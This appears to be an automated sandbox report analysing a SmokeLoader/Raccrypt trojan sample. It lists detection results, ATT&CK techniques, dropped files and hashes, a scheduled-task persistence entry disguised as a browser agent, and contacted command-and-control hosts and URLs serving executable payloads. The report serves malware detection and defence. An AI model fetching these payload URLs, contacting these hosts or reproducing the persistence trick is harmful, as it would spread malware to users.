Source: Yara match	File source: 0000000B.00000002.781213827.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.733351124.0000000002051000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.720297741.0000000004F41000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.781100610.0000000000460000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 00000001.00000002.733146103.0000000000540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.781213827.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.733351124.0000000002051000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.720297741.0000000004F41000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.781100610.0000000000460000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	DLL Side-Loading1	Process Injection313	Masquerading11	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution1	Boot or Logon Initialization Scripts	DLL Side-Loading1	Virtualization/Sandbox Evasion12	LSASS Memory	Security Software Discovery431	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer13	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection313	Security Account Manager	Virtualization/Sandbox Evasion12	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol125	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information3	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing1	DCSync	System Information Discovery15	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	DLL Side-Loading1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	File Deletion1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
UZ6FEqlix4.exe	58%	Virustotal		Browse
UZ6FEqlix4.exe	20%	Metadefender		Browse
UZ6FEqlix4.exe	63%	ReversingLabs	Win32.Trojan.Raccrypt
UZ6FEqlix4.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\eveggtb	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\411F.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\411F.exe	20%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\411F.exe	67%	ReversingLabs	Win32.Trojan.Raccrypt
C:\Users\user\AppData\Roaming\eveggtb	20%	Metadefender		Browse
C:\Users\user\AppData\Roaming\eveggtb	67%	ReversingLabs	Win32.Trojan.Raccrypt

Unpacked PE Files

Source	Detection	Scanner	Label	Download
11.2.eveggtb.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.UZ6FEqlix4.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
20.2.411F.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.0.eveggtb.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.1.eveggtb.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.UZ6FEqlix4.exe.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.UZ6FEqlix4.exe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
19.2.411F.exe.4e15a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.UZ6FEqlix4.exe.5b15a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.0.eveggtb.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.UZ6FEqlix4.exe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
20.0.411F.exe.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.0.eveggtb.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.1.UZ6FEqlix4.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.2.eveggtb.4e15a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
20.0.411F.exe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
20.0.411F.exe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
20.1.411F.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
unicupload.top	15%	Virustotal		Browse
host-data-coin-11.com	14%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://host-data-coin-11.com/	0%	URL Reputation	safe
http://file-coin-host-12.com/	0%	URL Reputation	safe
http://data-host-coin-8.com/files/5376_1640094939_1074.exe	0%	Avira URL Cloud	safe
http://unicupload.top/install5.exe	100%	URL Reputation	phishing
http://privacytools-foryou-777.com/downloads/toolspab3.exe	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
unicupload.top	54.38.220.85	true	true	15%, Virustotal, Browse	unknown
host-data-coin-11.com	47.251.11.252	true	true	14%, Virustotal, Browse	unknown
privacytools-foryou-777.com	47.251.11.252	true	true		unknown
data-host-coin-8.com	47.251.11.252	true	true		unknown
infinity-cheats.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://host-data-coin-11.com/	true	URL Reputation: safe	unknown
http://file-coin-host-12.com/	true	URL Reputation: safe	unknown
http://data-host-coin-8.com/files/5376_1640094939_1074.exe	false	Avira URL Cloud: safe	unknown
http://unicupload.top/install5.exe	true	URL Reputation: phishing	unknown
http://privacytools-foryou-777.com/downloads/toolspab3.exe	true	Avira URL Cloud: malware	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.233.81.115	unknown	Russian Federation	50113	SUPERSERVERSDATACENTERRU	true
47.251.11.252	host-data-coin-11.com	United States	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true
185.186.142.166	unknown	Russian Federation	204490	ASKONTELRU	true
54.38.220.85	unicupload.top	France	16276	OVHFR	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	545931
Start date:	28.12.2021
Start time:	13:53:06
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	UZ6FEqlix4 (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@9/3@24/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 88.3% (good quality ratio 60%) Quality average: 52.3% Quality standard deviation: 40.9%
HCA Information:	Successful, ratio: 54% Number of executed functions: 21 Number of non-executed functions: 33
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.107.5.88, 13.107.42.16, 23.213.170.60, 92.122.145.220 Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, client-office365-tas.msedge.net, afdo-tas-offload.trafficmanager.net, ocos-office365-s2s.msedge.net, config.edge.skype.com.trafficmanager.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, ris.api.iris.microsoft.com, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, e12564.dspb.akamaiedge.net, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, e16646.dscg.akamaiedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, config.edge.skype.com, storeedgefd.dsx.mp.microsoft.com

Simulations

Behavior and APIs

Time	Type	Description
13:54:47	Task Scheduler	Run new task: Firefox Default Browser Agent B8BE4ECA53B9BE33 path: C:\Users\user\AppData\Roaming\eveggtb

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.233.81.115	NDb38yNfLs.exe	Get hash	malicious	Browse
	H4HU4rg1NM.exe	Get hash	malicious	Browse
	4BfFNMA5mb.exe	Get hash	malicious	Browse
	2esp3jydWv.exe	Get hash	malicious	Browse
	BPbhnXqI2a.exe	Get hash	malicious	Browse
	jCeYwcgr5J.exe	Get hash	malicious	Browse
	LdHUtWJP0t.exe	Get hash	malicious	Browse
	a253ieOlKV.exe	Get hash	malicious	Browse
	WmlQoYtC3H.exe	Get hash	malicious	Browse
	mUWI0AEawV.exe	Get hash	malicious	Browse
	sfCAJHSsuY.exe	Get hash	malicious	Browse
	vEof47Ils1.exe	Get hash	malicious	Browse
	IB70cFH5pG.exe	Get hash	malicious	Browse
	UkFZ88If3v.exe	Get hash	malicious	Browse
	b4a3cafc8553c06b17131e6b3afb38971312a4d91ae33.exe	Get hash	malicious	Browse
	KEEyXq1VKZ.exe	Get hash	malicious	Browse
	jcXNmyP7Hy.exe	Get hash	malicious	Browse
	FSiVYyANZh.exe	Get hash	malicious	Browse
	IKSk3gsBxb.exe	Get hash	malicious	Browse
	D9UReQYFRK.exe	Get hash	malicious	Browse
47.251.11.252	NDb38yNfLs.exe	Get hash	malicious	Browse	host-data-coin-11.com/
47.251.11.252	zaZKhjdQNN.exe	Get hash	malicious	Browse	file-file-host4.com/tratata.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
host-data-coin-11.com	NDb38yNfLs.exe	Get hash	malicious	Browse	47.251.11.252
	H4HU4rg1NM.exe	Get hash	malicious	Browse	5.188.89.48
	4BfFNMA5mb.exe	Get hash	malicious	Browse	5.188.89.48
	2esp3jydWv.exe	Get hash	malicious	Browse	82.148.18.132
	BPbhnXqI2a.exe	Get hash	malicious	Browse	82.148.18.132
	jCeYwcgr5J.exe	Get hash	malicious	Browse	82.148.18.132
	LdHUtWJP0t.exe	Get hash	malicious	Browse	82.148.18.132
	a253ieOlKV.exe	Get hash	malicious	Browse	82.148.18.132
	WmlQoYtC3H.exe	Get hash	malicious	Browse	82.148.18.132
	mUWI0AEawV.exe	Get hash	malicious	Browse	82.148.18.132
	sfCAJHSsuY.exe	Get hash	malicious	Browse	82.148.18.132
	vEof47Ils1.exe	Get hash	malicious	Browse	82.148.18.132
	IB70cFH5pG.exe	Get hash	malicious	Browse	82.148.18.132
	UkFZ88If3v.exe	Get hash	malicious	Browse	82.148.18.132
	b4a3cafc8553c06b17131e6b3afb38971312a4d91ae33.exe	Get hash	malicious	Browse	82.148.18.132
	KEEyXq1VKZ.exe	Get hash	malicious	Browse	82.148.18.132
	jcXNmyP7Hy.exe	Get hash	malicious	Browse	82.148.18.132
	FSiVYyANZh.exe	Get hash	malicious	Browse	82.148.18.132
	IKSk3gsBxb.exe	Get hash	malicious	Browse	82.148.18.132
	D9UReQYFRK.exe	Get hash	malicious	Browse	82.148.18.132
unicupload.top	NDb38yNfLs.exe	Get hash	malicious	Browse	54.38.220.85
	H4HU4rg1NM.exe	Get hash	malicious	Browse	54.38.220.85
	4BfFNMA5mb.exe	Get hash	malicious	Browse	54.38.220.85
	2esp3jydWv.exe	Get hash	malicious	Browse	54.38.220.85
	BPbhnXqI2a.exe	Get hash	malicious	Browse	54.38.220.85
	jCeYwcgr5J.exe	Get hash	malicious	Browse	54.38.220.85
	LdHUtWJP0t.exe	Get hash	malicious	Browse	54.38.220.85
	a253ieOlKV.exe	Get hash	malicious	Browse	54.38.220.85
	WmlQoYtC3H.exe	Get hash	malicious	Browse	54.38.220.85
	mUWI0AEawV.exe	Get hash	malicious	Browse	54.38.220.85
	sfCAJHSsuY.exe	Get hash	malicious	Browse	54.38.220.85
	vEof47Ils1.exe	Get hash	malicious	Browse	54.38.220.85
	IB70cFH5pG.exe	Get hash	malicious	Browse	54.38.220.85
	UkFZ88If3v.exe	Get hash	malicious	Browse	54.38.220.85
	b4a3cafc8553c06b17131e6b3afb38971312a4d91ae33.exe	Get hash	malicious	Browse	54.38.220.85
	KEEyXq1VKZ.exe	Get hash	malicious	Browse	54.38.220.85
	FSiVYyANZh.exe	Get hash	malicious	Browse	54.38.220.85
	IKSk3gsBxb.exe	Get hash	malicious	Browse	54.38.220.85
	D9UReQYFRK.exe	Get hash	malicious	Browse	54.38.220.85
	YA2PzFg6r0.exe	Get hash	malicious	Browse	54.38.220.85

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SUPERSERVERSDATACENTERRU	NDb38yNfLs.exe	Get hash	malicious	Browse	185.233.81.115
	nUkbOfIFrC.exe	Get hash	malicious	Browse	185.112.83.8
	H4HU4rg1NM.exe	Get hash	malicious	Browse	185.233.81.115
	4BfFNMA5mb.exe	Get hash	malicious	Browse	185.233.81.115
	2esp3jydWv.exe	Get hash	malicious	Browse	185.233.81.115
	qDaFLbOSf5.exe	Get hash	malicious	Browse	185.255.134.22
	BPbhnXqI2a.exe	Get hash	malicious	Browse	185.233.81.115
	jCeYwcgr5J.exe	Get hash	malicious	Browse	185.233.81.115
	LdHUtWJP0t.exe	Get hash	malicious	Browse	185.233.81.115
	a253ieOlKV.exe	Get hash	malicious	Browse	185.233.81.115
	WmlQoYtC3H.exe	Get hash	malicious	Browse	185.233.81.115
	eiqhremk1t.exe	Get hash	malicious	Browse	185.112.83.8
	mUWI0AEawV.exe	Get hash	malicious	Browse	185.233.81.115
	sfCAJHSsuY.exe	Get hash	malicious	Browse	185.233.81.115
	vEof47Ils1.exe	Get hash	malicious	Browse	185.233.81.115
	IB70cFH5pG.exe	Get hash	malicious	Browse	185.233.81.115
	UkFZ88If3v.exe	Get hash	malicious	Browse	185.233.81.115
	b4a3cafc8553c06b17131e6b3afb38971312a4d91ae33.exe	Get hash	malicious	Browse	185.233.81.115
	8TDgYQyI5F.exe	Get hash	malicious	Browse	185.112.83.8
	KEEyXq1VKZ.exe	Get hash	malicious	Browse	185.233.81.115
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	NDb38yNfLs.exe	Get hash	malicious	Browse	47.251.11.252
	zaZKhjdQNN.exe	Get hash	malicious	Browse	47.251.11.252
	sora.arm7-20211227-2350	Get hash	malicious	Browse	47.251.104.82
	2esp3jydWv.exe	Get hash	malicious	Browse	47.251.38.135
	arm-20211227-1850	Get hash	malicious	Browse	8.212.11.123
	LdHUtWJP0t.exe	Get hash	malicious	Browse	47.251.38.135
	sfCAJHSsuY.exe	Get hash	malicious	Browse	47.251.38.135
	IB70cFH5pG.exe	Get hash	malicious	Browse	47.251.38.135
	SecuriteInfo.com.Variant.Zusy.399076.7630.exe	Get hash	malicious	Browse	47.251.12.107
	415XfKapA1.exe	Get hash	malicious	Browse	47.254.184.179
	RiU9SjOWmm.exe	Get hash	malicious	Browse	8.209.75.246
	1k1npeff0u.exe	Get hash	malicious	Browse	47.254.184.179
	EBMf8S7hP1.exe	Get hash	malicious	Browse	47.254.184.179
	8hTt1UXc6d.exe	Get hash	malicious	Browse	47.254.184.179
	Pc068pnLY4.exe	Get hash	malicious	Browse	47.254.184.179
	9vl0t7ohyv.exe	Get hash	malicious	Browse	47.254.184.179
	gV4DdBJxa1.exe	Get hash	malicious	Browse	47.254.184.179
	P6Z5gPgEYq.exe	Get hash	malicious	Browse	47.254.184.179
	v6JqtUXtOo.exe	Get hash	malicious	Browse	47.254.184.179
	4ZDLcXSjil.exe	Get hash	malicious	Browse	47.254.184.179

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Roaming\eveggtb	H4HU4rg1NM.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Roaming\eveggtb	2esp3jydWv.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\411F.exe	H4HU4rg1NM.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\411F.exe	2esp3jydWv.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\411F.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	339456
Entropy (8bit):	6.210575483974104
Encrypted:	false
SSDEEP:	6144:XFOSX78eVzsodTr6rv6acPyCmyD3+KHZc9FOKV:XvX77wo6rv6acPbmyDP5c9x
MD5:	5E0ED8966761E70EE0B8DCD141AAFB4C
SHA1:	933E68212D0F6D029E920BD93E5DCA7CA5BDCB7A
SHA-256:	8BBDDA1786E15A568A573A2F38762E95DE138AF969E0A13B96D7086AAA98BFC2
SHA-512:	D692905DDD5B1EA92ABED7FD38379947A9B453F5AEDEE91C5BE217E1799CC2B03C898FD99828EFA15A58C7811781DB8CBC90F5330640BF9361F60422DF22EB33
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 20%, Browse Antivirus: ReversingLabs, Detection: 67%
Joe Sandbox View:	Filename: H4HU4rg1NM.exe, Detection: malicious, Browse Filename: 2esp3jydWv.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@...@...@.../.L.Q.../.x.*...I.A.C...@......./.y.v.../.H.A.../.O.A...Rich@...........PE..L.....e`..................... .......=............@..........................@..................................................(........b......................$!..p...................................@............................................text...N........................... ..`.data...ho..........................@....pejevu......p.......~..............@....dozi...............................@....rsrc....b.......d..................@..@.reloc...;.......<..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\eveggtb Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	339456
Entropy (8bit):	6.210575483974104
Encrypted:	false
SSDEEP:	6144:XFOSX78eVzsodTr6rv6acPyCmyD3+KHZc9FOKV:XvX77wo6rv6acPbmyDP5c9x
MD5:	5E0ED8966761E70EE0B8DCD141AAFB4C
SHA1:	933E68212D0F6D029E920BD93E5DCA7CA5BDCB7A
SHA-256:	8BBDDA1786E15A568A573A2F38762E95DE138AF969E0A13B96D7086AAA98BFC2
SHA-512:	D692905DDD5B1EA92ABED7FD38379947A9B453F5AEDEE91C5BE217E1799CC2B03C898FD99828EFA15A58C7811781DB8CBC90F5330640BF9361F60422DF22EB33
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 20%, Browse Antivirus: ReversingLabs, Detection: 67%
Joe Sandbox View:	Filename: H4HU4rg1NM.exe, Detection: malicious, Browse Filename: 2esp3jydWv.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@...@...@.../.L.Q.../.x.*...I.A.C...@......./.y.v.../.H.A.../.O.A...Rich@...........PE..L.....e`..................... .......=............@..........................@..................................................(........b......................$!..p...................................@............................................text...N........................... ..`.data...ho..........................@....pejevu......p.......~..............@....dozi...............................@....rsrc....b.......d..................@..@.reloc...;.......<..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\eveggtb:Zone.Identifier Download File
Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.210575483974104
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	UZ6FEqlix4.exe
File size:	339456
MD5:	5e0ed8966761e70ee0b8dcd141aafb4c
SHA1:	933e68212d0f6d029e920bd93e5dca7ca5bdcb7a
SHA256:	8bbdda1786e15a568a573a2f38762e95de138af969e0a13b96d7086aaa98bfc2
SHA512:	d692905ddd5b1ea92abed7fd38379947a9b453f5aedee91c5be217e1799cc2b03c898fd99828efa15a58c7811781db8cbc90f5330640bf9361f60422df22eb33
SSDEEP:	6144:XFOSX78eVzsodTr6rv6acPyCmyD3+KHZc9FOKV:XvX77wo6rv6acPbmyDP5c9x
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@...@...@.../.L.Q.../.x.*...I.A.C...@......./.y.v.../.H.A.../.O.A...Rich@...........PE..L.....e`..................... .....

File Icon


Icon Hash:	b2e8e8e8aaa2a488

Static PE Info

General
Entrypoint:	0x423db0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x6065B41B [Thu Apr 1 11:52:59 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	39de84e7a601fa8861e0e6a8c8b0a138

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007FBB8105AEABh
call 00007FBB81052586h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 0043E6E0h
push 004275F0h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF98h
push ebx
push esi
push edi
mov eax, dword ptr [00447B80h]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [00401228h]
cmp dword ptr [004C6F4Ch], 00000000h
jne 00007FBB81052580h
push 00000000h
push 00000000h
push 00000001h
push 00000000h
call dword ptr [00401224h]
call 00007FBB81052703h
mov dword ptr [ebp-6Ch], eax
call 00007FBB81056CBBh
test eax, eax
jne 00007FBB8105257Ch
push 0000001Ch
call 00007FBB810526C0h
add esp, 04h
call 00007FBB810580B8h
test eax, eax
jne 00007FBB8105257Ch
push 00000010h
call 00007FBB810526ADh
add esp, 04h
push 00000001h
call 00007FBB81051823h
add esp, 04h
call 00007FBB8105A02Bh
mov dword ptr [ebp-04h], 00000000h
call 00007FBB8105B80Fh
test eax, eax

Rich Headers

Programming Language:

[LNK] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3ebcc	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc9000	0x6288	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd0000	0x2124	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1370	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa5b8	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x2e8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3ed4e	0x3ee00	False	0.565722850398	data	6.87583252941	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x40000	0x86f68	0x8c00	False	0.0388950892857	data	0.690472674069	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.pejevu	0xc7000	0x5	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.dozi	0xc8000	0xd93	0xe00	False	0.00697544642857	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xc9000	0x6288	0x6400	False	0.481875	data	5.03814907839	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd0000	0x3bee	0x3c00	False	0.449674479167	data	4.58044690622	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0xcca90	0x130	data	Divehi; Dhivehi; Maldivian	Maldives
RT_CURSOR	0xccbd8	0x130	data	Divehi; Dhivehi; Maldivian	Maldives
RT_CURSOR	0xccd08	0xf0	data	Divehi; Dhivehi; Maldivian	Maldives
RT_CURSOR	0xccdf8	0x10a8	dBase III DBT, version number 0, next free block index 40	Divehi; Dhivehi; Maldivian	Maldives
RT_CURSOR	0xcded0	0x8a8	dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"	Divehi; Dhivehi; Maldivian	Maldives
RT_ICON	0xc95a0	0x8a8	data	Spanish	Colombia
RT_ICON	0xc9e48	0x6c8	data	Spanish	Colombia
RT_ICON	0xca510	0x568	GLS_BINARY_LSB_FIRST	Spanish	Colombia
RT_ICON	0xcaa78	0x10a8	data	Spanish	Colombia
RT_ICON	0xcbb20	0x988	data	Spanish	Colombia
